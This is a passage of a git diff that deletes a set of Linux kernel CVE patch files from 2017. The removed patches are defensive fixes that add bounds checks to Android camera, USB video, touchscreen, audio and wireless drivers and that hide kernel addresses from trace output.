- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
-@@ -4177,8 +4182,8 @@ static int _setup_f9_cmdlistptrs(struct qce_device *pdev, int cri_index,
- 					pdev->reg.crypto_cfg_le, NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0627/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0627/ANY/0001.patch
deleted file mode 100644
index 16dcf793..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0627/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From fcca203d8e6aa0ef22fa41d72a06dea393d6d148 Mon Sep 17 00:00:00 2001
-From: Robb Glasser <rglasser@google.com>
-Date: Tue, 14 Feb 2017 13:25:46 -0800
-Subject: Prevent heap overflow in uvc driver
-
-The size of uvc_control_mapping is user controlled leading to a
-potential heap overflow in the uvc driver. This adds a check to verify
-the user provided size fits within the bounds of the defined buffer
-size.
-
-Bug: 33300353
-Change-Id: If29c1b396633b6137966a12e38f6fd1841b045bd
-Signed-off-by: Robb Glasser <rglasser@google.com>
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 8bc3ec72a02052187397d0de1a7b8bbe7340451c
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- drivers/media/usb/uvc/uvc_ctrl.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
-index a2f4501..f61d1d7 100644
---- a/drivers/media/usb/uvc/uvc_ctrl.c
-+++ b/drivers/media/usb/uvc/uvc_ctrl.c
-@@ -1939,6 +1939,9 @@ int uvc_ctrl_add_mapping(struct uvc_video_chain *chain,
- 	if (!found)
- 		return -ENOENT;
- 
-+	if (ctrl->info.size < mapping->size)
-+		return -EINVAL;
-+
- 	if (mutex_lock_interruptible(&chain->ctrl_mutex))
- 		return -ERESTARTSYS;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0628/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0628/ANY/0001.patch
deleted file mode 100644
index 2635e7bc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0628/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 012e37bf91490c5b59ba2ab68a4d214b632b613f Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Tue, 8 Nov 2016 11:52:55 -0800
-Subject: msm: camera: sensor: Validate i2c_frq_mode in msm_cci_get_clk_rates
-
-i2c_freq_mode in msm_cci_get_clk_rates is populated from userspace.
-Validate to make sure it has valid values. If a large number is sent
-from userspace to avoid a buffer over read.
-
-Crs-Fixed: 1086833
-Change-Id: I237f60dca3e3dbad4e6188bf047cf7ec5163d159
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index b1c2382..f113bdc 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -115,15 +115,16 @@ static int32_t msm_cci_set_clk_param(struct cci_device *cci_dev,
- 	enum cci_i2c_master_t master = c_ctrl->cci_info->cci_i2c_master;
- 	enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode;
- 
--	clk_params = &cci_dev->cci_clk_params[i2c_freq_mode];
--
- 	if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) {
- 		pr_err("%s:%d invalid i2c_freq_mode = %d",
- 			__func__, __LINE__, i2c_freq_mode);
- 		return -EINVAL;
- 	}
-+
- 	if (cci_dev->i2c_freq_mode[master] == i2c_freq_mode)
- 		return 0;
-+
-+	clk_params = &cci_dev->cci_clk_params[i2c_freq_mode];
- 	if (MASTER_0 == master) {
- 		msm_camera_io_w_mb(clk_params->hw_thigh << 16 |
- 			clk_params->hw_tlow,
-@@ -1196,6 +1197,13 @@ static uint32_t *msm_cci_get_clk_rates(struct cci_device *cci_dev,
- 	struct msm_cci_clk_params_t *clk_params = NULL;
- 	enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode;
- 	struct device_node *of_node = cci_dev->pdev->dev.of_node;
-+
-+	if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) {
-+		pr_err("%s:%d invalid i2c_freq_mode %d\n",
-+			__func__, __LINE__, i2c_freq_mode);
-+		return NULL;
-+	}
-+
- 	clk_params = &cci_dev->cci_clk_params[i2c_freq_mode];
- 	cci_clk_src = clk_params->cci_clk_src;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0629/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0629/ANY/0001.patch
deleted file mode 100644
index 2635e7bc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0629/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 012e37bf91490c5b59ba2ab68a4d214b632b613f Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Tue, 8 Nov 2016 11:52:55 -0800
-Subject: msm: camera: sensor: Validate i2c_frq_mode in msm_cci_get_clk_rates
-
-i2c_freq_mode in msm_cci_get_clk_rates is populated from userspace.
-Validate to make sure it has valid values. If a large number is sent
-from userspace to avoid a buffer over read.
-
-Crs-Fixed: 1086833
-Change-Id: I237f60dca3e3dbad4e6188bf047cf7ec5163d159
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index b1c2382..f113bdc 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -115,15 +115,16 @@ static int32_t msm_cci_set_clk_param(struct cci_device *cci_dev,
- 	enum cci_i2c_master_t master = c_ctrl->cci_info->cci_i2c_master;
- 	enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode;
- 
--	clk_params = &cci_dev->cci_clk_params[i2c_freq_mode];
--
- 	if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) {
- 		pr_err("%s:%d invalid i2c_freq_mode = %d",
- 			__func__, __LINE__, i2c_freq_mode);
- 		return -EINVAL;
- 	}
-+
- 	if (cci_dev->i2c_freq_mode[master] == i2c_freq_mode)
- 		return 0;
-+
-+	clk_params = &cci_dev->cci_clk_params[i2c_freq_mode];
- 	if (MASTER_0 == master) {
- 		msm_camera_io_w_mb(clk_params->hw_thigh << 16 |
- 			clk_params->hw_tlow,
-@@ -1196,6 +1197,13 @@ static uint32_t *msm_cci_get_clk_rates(struct cci_device *cci_dev,
- 	struct msm_cci_clk_params_t *clk_params = NULL;
- 	enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode;
- 	struct device_node *of_node = cci_dev->pdev->dev.of_node;
-+
-+	if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) {
-+		pr_err("%s:%d invalid i2c_freq_mode %d\n",
-+			__func__, __LINE__, i2c_freq_mode);
-+		return NULL;
-+	}
-+
- 	clk_params = &cci_dev->cci_clk_params[i2c_freq_mode];
- 	cci_clk_src = clk_params->cci_clk_src;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0630/3.10/0001.patch
deleted file mode 100644
index 58230690..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0001.patch
+++ /dev/null
@@ -1,80 +0,0 @@
-From 28fb06421ab3d9256d32611138306470996cc4c1 Mon Sep 17 00:00:00 2001
-From: "Steven Rostedt (Red Hat)" <rostedt@goodmis.org>
-Date: Tue, 22 Mar 2016 17:30:58 -0400
-Subject: [PATCH] UPSTREAM: tracing: Fix trace_printk() to print when not using
- bprintk()
-
-The trace_printk() code will allocate extra buffers if the compile detects
-that a trace_printk() is used. To do this, the format of the trace_printk()
-is saved to the __trace_printk_fmt section, and if that section is bigger
-than zero, the buffers are allocated (along with a message that this has
-happened).
-
-If trace_printk() uses a format that is not a constant, and thus something
-not guaranteed to be around when the print happens, the compiler optimizes
-the fmt out, as it is not used, and the __trace_printk_fmt section is not
-filled. This means the kernel will not allocate the special buffers needed
-for the trace_printk() and the trace_printk() will not write anything to the
-tracing buffer.
-
-Adding a "__used" to the variable in the __trace_printk_fmt section will
-keep it around, even though it is set to NULL. This will keep the string
-from being printed in the debugfs/tracing/printk_formats section as it is
-not needed.
-
-Reported-by: Vlastimil Babka <vbabka@suse.cz>
-Fixes: 07d777fe8c398 "tracing: Add percpu buffers for trace_printk()"
-Cc: stable@vger.kernel.org # v3.5+
-Bug: 34277115
-Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
-Change-Id: I10ce56caa41c7644d9d290d9ed272a6d156c938c
----
- include/linux/kernel.h      | 6 +++---
- kernel/trace/trace_printk.c | 3 +++
- 2 files changed, 6 insertions(+), 3 deletions(-)
-
-diff --git a/include/linux/kernel.h b/include/linux/kernel.h
-index 44d0a02224897..0d1fa1b442209 100644
---- a/include/linux/kernel.h
-+++ b/include/linux/kernel.h
-@@ -554,7 +554,7 @@ do {							\
- 
- #define do_trace_printk(fmt, args...)					\
- do {									\
--	static const char *trace_printk_fmt				\
-+	static const char *trace_printk_fmt __used			\
- 		__attribute__((section("__trace_printk_fmt"))) =	\
- 		__builtin_constant_p(fmt) ? fmt : NULL;			\
- 									\
-@@ -601,7 +601,7 @@ extern int __trace_puts(unsigned long ip, const char *str, int size);
-  */
- 
- #define trace_puts(str) ({						\
--	static const char *trace_printk_fmt				\
-+	static const char *trace_printk_fmt __used			\
- 		__attribute__((section("__trace_printk_fmt"))) =	\
- 		__builtin_constant_p(str) ? str : NULL;			\
- 									\
-@@ -621,7 +621,7 @@ extern void trace_dump_stack(int skip);
- #define ftrace_vprintk(fmt, vargs)					\
- do {									\
- 	if (__builtin_constant_p(fmt)) {				\
--		static const char *trace_printk_fmt			\
-+		static const char *trace_printk_fmt __used		\
- 		  __attribute__((section("__trace_printk_fmt"))) =	\
- 			__builtin_constant_p(fmt) ? fmt : NULL;		\
- 									\
-diff --git a/kernel/trace/trace_printk.c b/kernel/trace/trace_printk.c
-index a9077c1b4ad3f..fdb23e84b011b 100644
---- a/kernel/trace/trace_printk.c
-+++ b/kernel/trace/trace_printk.c
-@@ -272,6 +272,9 @@ static int t_show(struct seq_file *m, void *v)
- 	const char *str = *fmt;
- 	int i;
- 
-+	if (!*fmt)
-+		return 0;
-+
- 	seq_printf(m, "0x%lx : \"", *(unsigned long *)fmt);
- 
- 	/*
diff --git a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0630/3.10/0002.patch
deleted file mode 100644
index 3dc82545..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0002.patch
+++ /dev/null
@@ -1,27 +0,0 @@
-From 45e5a5e1b85f23843b90f3cddcfc26fa862ff80c Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Fri, 3 Mar 2017 15:40:12 -0800
-Subject: [PATCH] tracing: do not leak kernel addresses
-
-This likely breaks tracing tools like trace-cmd.  It logs in the same
-format but now addresses are all 0x0.
-
-Bug: 34277115
-Change-Id: Ifb0d4d2a184bf0d95726de05b1acee0287a375d9
----
- kernel/trace/trace_printk.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/trace/trace_printk.c b/kernel/trace/trace_printk.c
-index fdb23e84b011b..f423e8d551c0a 100644
---- a/kernel/trace/trace_printk.c
-+++ b/kernel/trace/trace_printk.c
-@@ -275,7 +275,7 @@ static int t_show(struct seq_file *m, void *v)
- 	if (!*fmt)
- 		return 0;
- 
--	seq_printf(m, "0x%lx : \"", *(unsigned long *)fmt);
-+	seq_printf(m, "0x%lx : \"", 0L);
- 
- 	/*
- 	 * Tabs and new lines need to be converted.
diff --git a/Patches/Linux_CVEs/CVE-2017-0631/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0631/ANY/0001.patch
deleted file mode 100644
index 67cf9630..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0631/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 8236d6ebc7e26361ca7078cbeba01509f10941d8 Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Tue, 22 Nov 2016 11:04:04 -0800
-Subject: msm: camera: flash: Validate the power setting size
-
-Validate the power setting size before copying.
-If userspace sends a value which is greater than
-MAX_POWER_CONFIG, then the driver accesses unintended memory.
-This change will fix the issue.
-
-CRs-Fixed: 1093232
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
-Change-Id: Ia49963248a94765baa19695294b197ea6f3bb8e2
----
- drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 5f749bd..6c8826b 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -269,6 +269,16 @@ static int32_t msm_flash_i2c_init(
- 	flash_ctrl->power_info.power_down_setting_size =
- 		flash_ctrl->power_setting_array.size_down;
- 
-+	if ((flash_ctrl->power_info.power_setting_size > MAX_POWER_CONFIG) ||
-+	(flash_ctrl->power_info.power_down_setting_size > MAX_POWER_CONFIG)) {
-+		pr_err("%s:%d invalid power setting size=%d size_down=%d\n",
-+			__func__, __LINE__,
-+			flash_ctrl->power_info.power_setting_size,
-+			flash_ctrl->power_info.power_down_setting_size);
-+		rc = -EINVAL;
-+		goto msm_flash_i2c_init_fail;
-+	}
-+
- 	rc = msm_camera_power_up(&flash_ctrl->power_info,
- 		flash_ctrl->flash_device_type,
- 		&flash_ctrl->flash_i2c_client);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0632/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0632/ANY/0001.patch
deleted file mode 100644
index e2e26330..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0632/ANY/0001.patch
+++ /dev/null
@@ -1,85 +0,0 @@
-From 970d6933e53c1f7ca8c8b67f49147b18505c3b8f Mon Sep 17 00:00:00 2001
-From: Aravind Kumar <akumark@codeaurora.org>
-Date: Mon, 11 May 2015 18:19:11 +0530
-Subject: ASoC: msm8x16-wcd: prevent out of bounds access
-
-Hardcoding the third argument in strnstr function
-is resulting in out of bounds access. Set the third argument
-to sizeof the character string passed as the first argument
-to prevent out of bounds access.
-
-CRs-Fixed: 832915
-Change-Id: I61be88701340e271fd866e0e1801722dbe7d63ac
-Signed-off-by: Aravind Kumar <akumark@codeaurora.org>
----
- sound/soc/codecs/msm8x16-wcd.c | 24 ++++++++++++------------
- 1 file changed, 12 insertions(+), 12 deletions(-)
-
-diff --git a/sound/soc/codecs/msm8x16-wcd.c b/sound/soc/codecs/msm8x16-wcd.c
-index 296f7d3..9a193c67 100644
---- a/sound/soc/codecs/msm8x16-wcd.c
-+++ b/sound/soc/codecs/msm8x16-wcd.c
-@@ -2603,19 +2603,19 @@ static int msm8x16_wcd_codec_enable_micbias(struct snd_soc_dapm_widget *w,
- 	micbias2 = (snd_soc_read(codec, MSM8X16_WCD_A_ANALOG_MICB_2_EN) & 0x80);
- 	switch (event) {
- 	case SND_SOC_DAPM_PRE_PMU:
--		if (strnstr(w->name, internal1_text, 30)) {
-+		if (strnstr(w->name, internal1_text, strlen(w->name))) {
- 			if (get_codec_version(msm8x16_wcd) == CAJON)
- 				snd_soc_update_bits(codec,
- 					MSM8X16_WCD_A_ANALOG_TX_1_2_ATEST_CTL_2,
- 					0x02, 0x02);
- 			snd_soc_update_bits(codec, micb_int_reg, 0x80, 0x80);
--		} else if (strnstr(w->name, internal2_text, 30)) {
-+		} else if (strnstr(w->name, internal2_text, strlen(w->name))) {
- 			snd_soc_update_bits(codec, micb_int_reg, 0x10, 0x10);
- 			snd_soc_update_bits(codec, w->reg, 0x60, 0x00);
--		} else if (strnstr(w->name, internal3_text, 30)) {
-+		} else if (strnstr(w->name, internal3_text, strlen(w->name))) {
- 			snd_soc_update_bits(codec, micb_int_reg, 0x2, 0x2);
- 		}
--		if (!strnstr(w->name, external_text, 30))
-+		if (!strnstr(w->name, external_text, strlen(w->name)))
- 			snd_soc_update_bits(codec,
- 				MSM8X16_WCD_A_ANALOG_MICB_1_EN, 0x05, 0x04);
- 		if (w->reg == MSM8X16_WCD_A_ANALOG_MICB_1_EN)
-@@ -2624,28 +2624,28 @@ static int msm8x16_wcd_codec_enable_micbias(struct snd_soc_dapm_widget *w,
- 		break;
- 	case SND_SOC_DAPM_POST_PMU:
- 		usleep_range(20000, 20100);
--		if (strnstr(w->name, internal1_text, 30)) {
-+		if (strnstr(w->name, internal1_text, strlen(w->name))) {
- 			snd_soc_update_bits(codec, micb_int_reg, 0x40, 0x40);
--		} else if (strnstr(w->name, internal2_text, 30)) {
-+		} else if (strnstr(w->name, internal2_text,  strlen(w->name))) {
- 			snd_soc_update_bits(codec, micb_int_reg, 0x08, 0x08);
- 			msm8x16_notifier_call(codec,
- 					WCD_EVENT_PRE_MICBIAS_2_ON);
--		} else if (strnstr(w->name, internal3_text, 30)) {
-+		} else if (strnstr(w->name, internal3_text, strlen(w->name))) {
- 			snd_soc_update_bits(codec, micb_int_reg, 0x01, 0x01);
--		} else if (strnstr(w->name, external2_text, 30)) {
-+		} else if (strnstr(w->name, external2_text, strlen(w->name))) {
- 			msm8x16_notifier_call(codec,
- 					WCD_EVENT_PRE_MICBIAS_2_ON);
- 		}
- 		break;
- 	case SND_SOC_DAPM_POST_PMD:
--		if (strnstr(w->name, internal1_text, 30)) {
-+		if (strnstr(w->name, internal1_text, strlen(w->name))) {
- 			snd_soc_update_bits(codec, micb_int_reg, 0xC0, 0x40);
--		} else if (strnstr(w->name, internal2_text, 30)) {
-+		} else if (strnstr(w->name, internal2_text, strlen(w->name))) {
- 			msm8x16_notifier_call(codec,
- 					WCD_EVENT_PRE_MICBIAS_2_OFF);
--		} else if (strnstr(w->name, internal3_text, 30)) {
-+		} else if (strnstr(w->name, internal3_text, strlen(w->name))) {
- 			snd_soc_update_bits(codec, micb_int_reg, 0x2, 0x0);
--		} else if (strnstr(w->name, external2_text, 30)) {
-+		} else if (strnstr(w->name, external2_text, strlen(w->name))) {
- 			/*
- 			 * send micbias turn off event to mbhc driver and then
- 			 * break, as no need to set MICB_1_EN register.
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0633/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0633/ANY/0001.patch
deleted file mode 100644
index 2a04b066..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0633/ANY/0001.patch
+++ /dev/null
@@ -1,128 +0,0 @@
-From 4e38c573e81eb76f09bae425f035be392fbab370 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Fri, 24 Mar 2017 14:04:03 -0700
-Subject: [PATCH] net: wireless: bcmdhd: fix for IOVAR GET failed
-
-found some case that IOVAR callers set response buffer not enough to
-contain input command string + argument. so it finally fail in IOVAR
-transaction by its shorter buffer length.
-
-proposed fix is taking care this case by providing enough local
-buffer inside dhd_iovar, which enough to input/output.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 36000515
-Change-Id: I0afedcc29b05b12f42ebc619e6feeaa868fc00de
----
- drivers/net/wireless/bcmdhd/dhd_linux.c | 81 ++++++++++++++++++++++++---------
- 1 file changed, 59 insertions(+), 22 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 17e503c6d6b35..0b66e914c15a0 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -6257,45 +6257,82 @@ dhd_iovar(dhd_pub_t *pub, int ifidx, char *name, char *param_buf,
- 		return BCME_BADARG;
- 
- 	input_len = strlen(name) + 1 + param_len;
-+	if (input_len > WLC_IOCTL_MAXLEN)
-+		return BCME_BADARG;
-+	buf = NULL;
- 	if (set) {
- 		if (res_buf || res_len != 0) {
- 			DHD_ERROR(("%s: SET wrong arguemnet\n", __FUNCTION__));
- 			return BCME_BADARG;
- 		}
--		buf = kzalloc(input_len, GFP_ATOMIC);
-+		buf = kzalloc(input_len, GFP_KERNEL);
- 		if (!buf) {
- 			DHD_ERROR(("%s: mem alloc failed\n", __FUNCTION__));
- 			return BCME_NOMEM;
- 		}
- 		ret = bcm_mkiovar(name, param_buf, param_len, buf, input_len);
-+		if (!ret) {
-+			ret = BCME_NOMEM;
-+			goto exit;
-+		}
-+
-+		ioc.cmd = WLC_SET_VAR;
-+		ioc.buf = buf;
-+		ioc.len = input_len;
-+		ioc.set = set;
-+
-+		ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len);
-+
- 	} else {
--		if (!res_buf) {
--			DHD_ERROR(("%s: GET failed. resp_buf NULL\n",
-+		if (!res_buf || res_len == 0) {
-+			DHD_ERROR(("%s: GET failed. resp_buf NULL or len:0\n",
- 				   __FUNCTION__));
- 			return BCME_NOMEM;
- 		}
- 		if (res_len < input_len) {
--			DHD_ERROR(("%s: res_len(%d) < input_len(%d)\n",
--				   __FUNCTION__, res_len, input_len));
--			return BCME_NOMEM;
--		}
--		memset(res_buf, 0, res_len);
--		ret = bcm_mkiovar(name, param_buf, param_len, res_buf, res_len);
--	}
--	if (ret == 0) {
--		if (set)
--			kfree(buf);
--		return BCME_NOMEM;
--	}
-+			DHD_INFO(("%s: res_len(%d) < input_len(%d)\n",
-+				  __FUNCTION__, res_len, input_len));
-+			buf = kzalloc(input_len, GFP_KERNEL);
-+			if (!buf) {
-+				DHD_ERROR(("%s: mem alloc failed\n",
-+					   __FUNCTION__));
-+				return BCME_NOMEM;
-+			}
-+			ret = bcm_mkiovar(name, param_buf, param_len, buf,
-+					  input_len);
-+			if (!ret) {
-+				ret = BCME_NOMEM;
-+				goto exit;
-+			}
- 
--	ioc.cmd = set ? WLC_SET_VAR : WLC_GET_VAR;
--	ioc.buf = set ? buf : res_buf;
--	ioc.len = set ? ret : res_len;
--	ioc.set = set;
-+			ioc.cmd = WLC_GET_VAR;
-+			ioc.buf = buf;
-+			ioc.len = input_len;
-+			ioc.set = set;
- 
--	ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len);
--	if (set)
--		kfree(buf);
-+			ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len);
-+
-+			if (ret == BCME_OK)
-+				memcpy(res_buf, buf, res_len);
-+		} else {
-+			memset(res_buf, 0, res_len);
-+			ret = bcm_mkiovar(name, param_buf, param_len, res_buf,
-+					  res_len);
-+			if (!ret) {
-+				ret = BCME_NOMEM;
-+				goto exit;
-+			}
-+
-+			ioc.cmd = WLC_GET_VAR;
-+			ioc.buf = res_buf;
-+			ioc.len = res_len;
-+			ioc.set = set;
-+
-+			ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len);
-+		}
-+	}
-+exit:
-+	kfree(buf);
- 	return ret;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch
deleted file mode 100644
index 24a62aed..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
-index 5a0bd93..d393eeb 100644
---- a/include/linux/sysrq.h
-+++ b/include/linux/sysrq.h
-@@ -18,7 +18,7 @@
- #include <linux/types.h>
- 
- /* Enable/disable SYSRQ support by default (0==no, 1==yes). */
--#define SYSRQ_DEFAULT_ENABLE	1
-+#define SYSRQ_DEFAULT_ENABLE	0
- 
- /* Possible values of bitmask for enabling sysrq functions */
- /* 0x0001 is reserved for enable everything */
diff --git a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch.base64
deleted file mode 100644
index 9daf348f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvc3lzcnEuaCBiL2luY2x1ZGUvbGludXgvc3lzcnEuaAppbmRleCA1YTBiZDkzLi5kMzkzZWViIDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L3N5c3JxLmgKKysrIGIvaW5jbHVkZS9saW51eC9zeXNycS5oCkBAIC0xOCw3ICsxOCw3IEBACiAjaW5jbHVkZSA8bGludXgvdHlwZXMuaD4KIAogLyogRW5hYmxlL2Rpc2FibGUgU1lTUlEgc3VwcG9ydCBieSBkZWZhdWx0ICgwPT1ubywgMT09eWVzKS4gKi8KLSNkZWZpbmUgU1lTUlFfREVGQVVMVF9FTkFCTEUJMQorI2RlZmluZSBTWVNSUV9ERUZBVUxUX0VOQUJMRQkwCiAKIC8qIFBvc3NpYmxlIHZhbHVlcyBvZiBiaXRtYXNrIGZvciBlbmFibGluZyBzeXNycSBmdW5jdGlvbnMgKi8KIC8qIDB4MDAwMSBpcyByZXNlcnZlZCBmb3IgZW5hYmxlIGV2ZXJ5dGhpbmcgKi8K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0650/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0650/ANY/0001.patch
deleted file mode 100644
index e2c32ab0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0650/ANY/0001.patch
+++ /dev/null
@@ -1,154 +0,0 @@
-From c6d874fd2c515406bc33ab78d60df70a47bddae2 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Fri, 7 Apr 2017 10:42:31 -0700
-Subject: [PATCH] input: synaptics_dsx: valid bounds of intr_reg_num
-
-Validate the intr_reg_num value returned by touchscreen
-to ensure no out of bounds access can occur.
-
-Bug: 35472278
-Change-Id: If98e7091bf938061ac1b473ec652a620f118dbf0
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx_htc_2.6/synaptics_dsx_core.c     | 50 ++++++++++++++++------
- 1 file changed, 38 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c
-index 90b6fc37284b7..dbe242808841b 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c
-@@ -2460,14 +2460,20 @@ static int synaptics_rmi4_irq_enable(struct synaptics_rmi4_data *rmi4_data,
- 	return retval;
- }
- 
--static void synaptics_rmi4_set_intr_mask(struct synaptics_rmi4_fn *fhandler,
--		struct synaptics_rmi4_fn_desc *fd,
--		unsigned int intr_count)
-+static int synaptics_rmi4_set_intr_mask(struct synaptics_rmi4_fn *fhandler,
-+					struct synaptics_rmi4_fn_desc *fd,
-+					unsigned int intr_count)
- {
- 	unsigned char ii;
- 	unsigned char intr_offset;
- 
- 	fhandler->intr_reg_num = (intr_count + 7) / 8;
-+	if (fhandler->intr_reg_num >= MAX_INTR_REGISTERS) {
-+		fhandler->intr_reg_num = 0;
-+		fhandler->num_of_data_sources = 0;
-+		fhandler->intr_mask = 0;
-+		return -EINVAL;
-+	}
- 	if (fhandler->intr_reg_num != 0)
- 		fhandler->intr_reg_num -= 1;
- 
-@@ -2479,7 +2485,7 @@ static void synaptics_rmi4_set_intr_mask(struct synaptics_rmi4_fn *fhandler,
- 			ii++)
- 		fhandler->intr_mask |= 1 << ii;
- 
--	return;
-+	return 0;
- }
- 
- static int synaptics_rmi4_f01_init(struct synaptics_rmi4_data *rmi4_data,
